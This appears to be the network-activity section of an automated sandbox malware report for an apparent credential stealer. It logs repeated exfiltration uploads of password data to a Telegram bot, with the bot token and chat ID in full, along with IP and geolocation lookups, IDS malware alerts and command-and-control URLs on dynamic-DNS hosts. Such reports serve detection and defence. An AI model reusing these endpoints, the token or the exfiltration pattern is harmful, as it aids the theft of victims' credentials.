                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd64c7a9c86413Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd652ea9fcdfeaHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd65a415df9222Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd660f0dfa52a2Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd66978ca909d2Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd67452ff21337Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd681b765ba4a1Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd68da11a59dfdHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6b8497422615Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6c488cef3084Host: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6ec88bdfa508Host: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6fee36357fdaHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd70fc6bb1d3ffHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                    Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49725 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 104.26.12.205:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.96.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2013/03/2025%20/%2007:17:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-4712085167&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd6312a955633aHost: api.telegram.orgContent-Length: 582
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 23:56:08 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-19134.crl0
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                    Source: RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059A0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab#J
                    Source: RegSvcs.exe, 00000001.00000002.3808058060.0000000000709000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059EE000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1acc170ef6d2e
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1acc170ef6
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1fe76c67b1
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?271409c843
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?281ec76f7b
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b0ff2c559
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b626a0cfe
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ba8557f9fc
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6fde197b3
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000024F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.0000000002475000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000024F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7725135953:AAG0wKbS2-n7tDPEidVg5BSQqtxiGP9tbWY/sendDocument?chat_id=-471
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3811760489.00000000059F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.00000000023B2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49657 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49634 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49637 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49663 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49640 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49654 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49643 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49660 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49649 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49655 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49632 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49661 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49658 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49629 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49646 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
